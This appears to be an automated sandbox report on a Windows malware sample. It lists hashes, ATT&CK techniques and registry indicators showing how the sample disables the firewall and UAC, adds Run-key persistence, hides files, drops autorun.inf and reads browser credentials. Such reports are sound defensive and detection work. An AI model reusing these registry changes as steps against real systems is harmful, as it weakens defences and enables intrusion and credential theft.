5f9f5634db8e30d9d11a63baa794863ecf4855637f95e81b6fe667d9f85cab72

Analysis

max time kernel
140s
max time network
133s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
10/08/2024, 05:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Size

273KB
MD5

84f755ce53cb1d70ba895c0f0f629595
SHA1

3fdf3e27b1541d52c9a865951a2bdee107c37473
SHA256

5f9f5634db8e30d9d11a63baa794863ecf4855637f95e81b6fe667d9f85cab72
SHA512

cd2cee1a1a8e4b53118b1a463fcf767a3fc72566663d16f5cbc563d79f2b9c47e4c1a60dbbd4c61faebcc1488a842783f9984433e2d52c2b5148918d3fb99de7
SSDEEP

6144:/BNw2vyd8KCg4pI4UJr22Ssdk/JplhD/zntJCkTSwKUxSwc:TwQyfdXCpj7nBNxS

Score

10^/10

defense_evasion discovery evasion persistence privilege_escalation spyware stealer trojan upx

Malware Config

Signatures

Modifies firewall policy service 3 TTPs 4 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	reg.exe

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3652	netsh.exe
4164	netsh.exe
1448	netsh.exe
4440	netsh.exe

Sets file to hidden 1 TTPs 10 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
3680	attrib.exe
4608	attrib.exe
4696	attrib.exe
1724	attrib.exe
636	attrib.exe
2548	attrib.exe
4540	attrib.exe
2368	attrib.exe
2732	attrib.exe
532	attrib.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe

Loads dropped DLL 3 IoCs

pid	Process
3852	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
516	IEXPLORE.EXE
548	IEXPLORE.EXE

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4036-0-0x00000000001B0000-0x0000000000203000-memory.dmp	upx
behavioral2/memory/4036-8-0x00000000001B0000-0x0000000000203000-memory.dmp	upx
behavioral2/files/0x000f0000000233f7-14.dat	upx
behavioral2/memory/3852-24-0x00000000001B0000-0x0000000000203000-memory.dmp	upx
behavioral2/memory/4036-223-0x00000000001B0000-0x0000000000203000-memory.dmp	upx
behavioral2/memory/3852-449-0x00000000001B0000-0x0000000000203000-memory.dmp	upx

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysrunc = "C:\\Windows\\System32\\sysrunc.exe"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\daemon = "C:\\Users\\Admin\\AppData\\Roaming\\daemon.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysrunc = "C:\\Windows\\system32\\sysrunc.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\daemon = "C:\\Users\\Admin\\AppData\\Roaming\\daemon.exe"	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysrunc = "C:\\Windows\\System32\\sysrunc.exe"	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\daemon = "C:\\Users\\Admin\\AppData\\Roaming\\daemon.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\sysrunc = "C:\\Windows\\system32\\sysrunc.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\daemon = "C:\\Users\\Admin\\AppData\\Roaming\\daemon.exe"	IEXPLORE.EXE

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Drops autorun.inf file 1 TTPs 5 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	F:\autorun.inf	attrib.exe
File created	F:\autorun.inf	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
File created	C:\autorun.inf	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
File created	D:\autorun.inf	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
File opened for modification	C:\autorun.inf	attrib.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\sysrunc.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\sysrunc.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\sysrunc.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\sysrunc.exe	attrib.exe
File opened for modification	C:\Windows\SysWOW64\sysrunc.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\sysrunc.exe	attrib.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

pid	Process
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
4036	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4444	sc.exe
4680	sc.exe
3388	sc.exe
728	sc.exe
4236	sc.exe
3152	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe

Modifies Control Panel 4 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\ScreenSaveActive = "1"	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\ScreenSaveTimeOut = "60"	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\ScreenSaveActive = "1"	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\Desktop\ScreenSaveTimeOut = "60"	84f755ce53cb1d70ba895c0f0f629595_JaffaCakes118.exe

Modifies Internet Explorer settings 1 TTPs 53 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_POPUPMANAGEMENT = "0"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "953590160"	IEXPLORE.EXE
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000	iexplore.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_FullURL = "yes"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "430033120"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31124199"	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_URLinStatusBar = "yes"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\MINIE	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_FullURL = "yes"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "949370971"	iexplore.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31124199"	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_StatusBar = "yes"	reg.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_URLinStatusBar = "yes"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\MINIE\ShowStatusBar = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_POPUPMANAGEMENT = "0"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\MINIE	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31124199"	IEXPLORE.EXE
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\MINIE\ShowStatusBar = "1"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{642F1846-56DA-11EF-BB4F-D60584CC4361} = "0"	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Show_StatusBar = "yes"	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "949370971"	iexplore.exe
